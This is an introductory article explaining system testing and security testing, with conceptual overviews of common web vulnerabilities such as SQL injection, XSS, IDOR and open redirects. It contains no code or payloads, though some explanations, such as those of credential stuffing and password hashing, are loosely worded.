What is System Testing?
In this system is checked and tested based on the risks and requirement specifications, business processes, and use cases. The testing is carried out from the user’s point of view. It is most often the final round of tests to verify that the software to be delivered meets the specification and its purpose and it may also find as many defects as possible. It is the type of black-box testing.
System testing requires test environment, control version of the software, test cases, and test data where the test environment corresponds to the production environment in order to minimize the risk of environment-specific failures not being found by testing. It also assesses the user-experience during the testing.
Followings incorporated in System Testing
Both functional and non-functional requirements of the system where non-functional tests include performance, compatibility, and reliability. Certain incomplete or undocumented requirements are also incorporated for testing at this level. The tests with different input data get executed to check the application is returning the expected outputs.
Objectives of System Testing
- To test the complete integrated applications including external components to check how components interact with one another and with the system as a whole. This is also called End to End testing.
- To verify the system by providing different input and check for desired outputs.
- To test the user’s experience with the application.
Different types of System testing
- Usability Testing
- Performance Testing
- Regression Testing
- Security Testing
- Recovery Testing
- Functional Testing
System Testing Process:
System Testing is performed in the following steps:
Test Environment Setup: In the test environment setup, a platform is built with software and network configured upon which the test cases are supposed to get executed. The configuration setup is done based on the need of the application under test. Setting up a right test environment will ultimately ensure software testing success otherwise it leads to depriving cost and time.
Create Test Case: Test cases are generated at a system level to determine if the system works as per the expected behavior. Test cases are written are supposed to verify the functionality of the software and use cases as well as it also includes negative scenarios and boundary conditions.
Create Test Data: Test data are generated with which the test cases need to be executed. Test data is generated both for testing the positive scenarios as well as negative scenarios. Test data is generally developed either through a manual way (which actually consumes a lot of time) or with the help of an automated test data generation tool.
Execute Test Case: The test case execution is the next step after designing test data and test cases. The test cases are executed in the designed testing environment. Test cases are executed based on priority.
Defect Reporting: With the execution of test cases, defects are identified in the system. Any deviation from the expected result marks the test case as ‘Fail’ and the defect is raised. Testcase is marked as ‘blocked’ if it is not possible to execute them due to defect.
Regression Testing: It is carried as a part of the testing process and performed each time code is changed and a software update is about to be released. Risk-based testing is also carried out at this phase in which the critical functionality of the application is tested in the first phase.
Defect Fixing: In this step, a fix is provided for the defect to test with a new software build released.
Retest: The defects which are fixed are verified and the corresponding failed test cases are executed again. If the defect exists while re-testing, it is marked as open, and then the cycle continues. Learn the defect life cycle.
Advantages of System Testing
- It verifies the system against the business, functional and non-functional requirements of the end-users.
- It helps in getting maximum bugs fixes before acceptance testing.
- It helps in increasing the confidence level of the team in the product before it goes for release.
Disadvantages of System Testing
- System testing starts only after all the components are ready and integration testing is completed, thus the cost of fixing bugs is higher.
- It is difficult to localize the bug as the entire system is participating in the testing.
What is Security Testing?
Security Testing intends to uncover threats, viruses, risks, or vulnerabilities of the system and ensure data and resources are protected from possible intruders. It aims at verifying confidentiality, integrity, authentication, authorization, and non-repudiation of the system.
The objective is to expose all the loopholes and fragility of the software which might result in loss of data under security attack.
Objectives of security testing
- To identify virus, threats, and vulnerabilities
- Detecting intrusions such as a denial of service attacks
- Checking for open ports
- Checking integrity of files and week passwords
Types of Security Testing
There are 7 types of security testing which are as below:
Vulnerability scanning: It performed with the help of automated software that scans a system against identified vulnerability.
Security scanning: It identifies the network and system weaknesses and provides the necessary solution. This scanning can be performed by both Manual and Automated way.
Penetration testing: Potential vulnerabilities are detected by simulating the attack that hacker can attempt to hack the system
Risk assessment: The analysis of security risks observed in the organization is being done. Risks are categorized as Low, Medium, and High which will further help to provide measures to reduce the risks.
Security auditing: An internal inspection of the application is done in the browser for checking the security flaws using code.
Posture assessment: This combines security scanning, ethical hacking, and risk assessments to grant the overall security of the organization.
Ethical hacking: It is an attempt to hack the security system of the organization in order to expose the flaws.
Focus of security testing
- Network security
- Support software such as OS, API, Database
- Application code and browser security
- Server security
Security Testing Areas
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It allows an attacker to view data that they are not normally unable to view. This might include data belonging to other users, or any other data that the application itself is able to access. An attacker can modify or delete this data, causing persistent changes to the application’s content or behavior. They can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure or perform a denial-of-service attack.
Broken Authentication & Session Management
Broken Authentication is in one of the OWASP Top 10 Vulnerabilities. The essence of Broken Authentication is where you (Web Application) allow your users to get into your website by creating a new account and handling it for specific reasons. In Broken Authentication, whenever a user login into its account, a session id is being created, and that session id is allowed to that particular account only
Now if the web application is crafted securely in terms of Authentication, then it is well and good but in case if it is not then the attacker may use several under given techniques.
- Credentials stuffing: In Credential Stuffing an attacker has a standard list of default passwords and usernames. By this list, they can brute-force the accounts and can log in into legitimate accounts. It is hardly recommended for users to change their default usernames and passwords to get secure from such attacks. An attacker can generate a list of Custom passwords also depending upon his prior information to the target by various tools in Linux such as CRUNCH.
- Unhashed Passwords: Changement of clear-text password into scrambled words through which an attacker can be tricked is called hashing of passwords. What an attacker does is, an attacker can intercept the user request as both of them are on the same network. Using the intercepted request they can clearly see the Clear Text Submission Of passwords that users submit on the website. Using this technique user can lose his Account Authorization & Confidentiality.
- Misconfigured Session Timeouts: The scenario where a user had log out of the account and an attacker has the cookie of that user. Using the cookie, an attacker can still have access to that account. Using this type of loophole Cookie Tampering, Session hijacking and other attacks can be chained into one single loophole, which is also known as chaining of bug. Such type bugs are referred to as Misconfigured Session Timeout
Insecure Direct Object Reference
Insecure direct object references (IDOR) are a cybersecurity issue that occurs when a web application developer uses an identifier for direct access to an internal implementation object but provides no additional access control and/or authorization checks. For example, an IDOR vulnerability would happen if the URL of a transaction could be changed through client-side user input to show unauthorized data of another transaction
Cross-Site Scripting (XSS)
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec up until 2007. In 2017, XSS attacks were still considered a major threat vector. XSS effects vary in range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site’s owner network.
If a component is susceptible to attack due to an insecure configuration it would classify as security misconfiguration. This is considered the same vulnerability regardless of whether the misconfiguration occurs in the web server, database, or in custom code. It is further classified as below:
- Prevalence: As security misconfiguration is such a broad category, it is a very common vulnerability. A web application is built upon multiple layers and making a configuration mistake in one of them is quite likely.
- Potential impact: The impact varies and depends on the specific kind of misconfiguration. At worst, it could lead to a full takeover, which means stolen sensitive data and expensive recovery.
- Exploitability: In many cases, this is one of the easiest vulnerabilities to exploit. For example, if a system admin forgets to delete a default account with admin privileges, all an attacker has to do is to simply google the default credentials to log in.
The Web Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application functionality and control.
This attack can be performed by a malicious user who wants to exploit the application for their own benefit or an attacker who wishes to attack a third-person using a Man-in-the-middle attack. In both cases, tools like Webscarab and Paros proxy are mostly used.
The attack success depends on integrity and logic validation mechanism errors, and its exploitation can result in other consequences including XSS, SQL Injection, file inclusion, and path disclosure attacks.
Unvalidated redirect vulnerabilities occur when an attacker is able to redirect a user to an untrusted site when the user visits a link located on a trusted website. This vulnerability is also often called Open Redirect. Unvalidated redirects and forwards were ranked as uncommon both in 2010 and 2013 when OWASP graded vulnerabilities in their top ten list.
The potential danger of Unvalidated Redirects and Forwards is not to be considered as that serious. The most common use case is phishing attacks or others that also involve Social Engineering, which lowers the potential impact of the vulnerability. It also happens that this is part of a chained attack, where it is only one in a chain of multiple vulnerabilities used. This type of attack is more advanced and therefore not as common.
In most cases, this vulnerability is very easy to exploit, which increases the likelihood of someone finding and abusing it. There have, of course, been cases where it has been much harder to exploit, but as the impact is not that great, the time used to look for the vulnerability is limited. This means it is mainly the easier cases of Unvalidated Redirects and Forwards that are discovered and exploited.